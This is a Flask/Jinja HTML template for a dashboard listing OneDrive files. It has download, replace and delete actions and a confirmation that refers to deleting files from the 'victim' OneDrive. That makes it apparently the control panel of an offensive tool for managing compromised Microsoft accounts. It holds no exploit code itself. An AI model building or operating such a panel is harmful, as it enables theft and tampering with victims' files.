{% extends "azure/layout.html" %}
{% block body %}

  <!-- partial -->
  <div class="main-panel">
    <div class="content-wrapper">
      <div class="row">
        <div class="col-lg-12 grid-margin">
            <div class="card">
              <div class="card-body">
                <div class="d-sm-flex align-items-center justify-content-between"><h4>OneDrive Files</h4>
                  <div class="btn-wrapper">
                      <a href="{{url_for('officeDelete', type='oneDrive')}}" class="btn btn-danger btn-md btn-icon-text text-white mt-1"><i class="menu-icon mdi mdi-delete "></i>Delete All</a>
                    </div>
                </div>
                <div class="form-group">
                  <input class="form-control mb-2 mr-sm-2 mt-2" id="displaySearch" name="displayName" placeholder="Keywords" type="text" value="">
                </div>
  
                <div class="table-responsive table-wrapper-scroll-y my-custom-scrollbar" style="max-height: 600px;" >
                  <table class="table table-hover"> 
                    <thead>
                      <tr>
                        <th>EmailId</th>
                        <th>File Name</th>
                        <th>Size</th>
                        <th>last Modified Date Time</th>
                        <th>Replace</th>
                        <th>Delete</th>
                      </tr>
                    </thead>
                    <tbody id="myTable">
                      {% for file in oneDrive %}
                        <tr>
                          <td>{{file.username}}</td>
                          <td>
                            <a href="{{ url_for('download', type='oneDrive', id=file.id) }}">
                            <div class="badge badge-opacity-success">
                              {{ file.filename }}
                              <i class="ti-download btn-icon-prepend"></i>
                            </div>
                            </a>
                          </td>
                          <td>{{  file.fileSize }}</td>
                          <td>{{  file.date }}</td>
                          <td>
                            <form action="{{ url_for('replace', username=file.username, id=file.id) }}" method="post" enctype="multipart/form-data">
                              <input type="file" id="{{file.id}}" name="oneDriveFile" onchange="this.form.submit()" hidden/>
                              <label class="btn btn-primary btn-icon-text" for="{{file.id}}">
                                <i class="ti-pencil btn-icon-prepend"></i>  
                                Replace
                              </label>
                              </form>
                          </td>
                          <td>
                            <a href="{{ url_for('delete', username=file.username, id=file.id) }}" type="button" onclick="return  confirm('Are You Sure?\r\nNote: File will be deleted from victim oneDrive as well!')" class="btn btn-danger btn-icon-text">
                                <i class="ti-trash btn-icon-prepend"></i>                                            
                                Delete
                            </a>
                          </td>
                        </tr>
                      {% endfor %}
                    </tbody>
                  </table>
                </div>
              </div>
            </div>
          </div>
      </div>
    </div>
  </div>
  <script src="{{ url_for('static',filename='js/jquery.min.js') }}"></script>
  <script>
    $(document).ready(function(){
      $("#displaySearch").on("keyup", function() {
        var value = $(this).val().toLowerCase();
        $("#myTable tr").filter(function() {
          $(this).toggle($(this).text().toLowerCase().indexOf(value) > -1)
        });
      });
    });
    </script>

{% endblock %}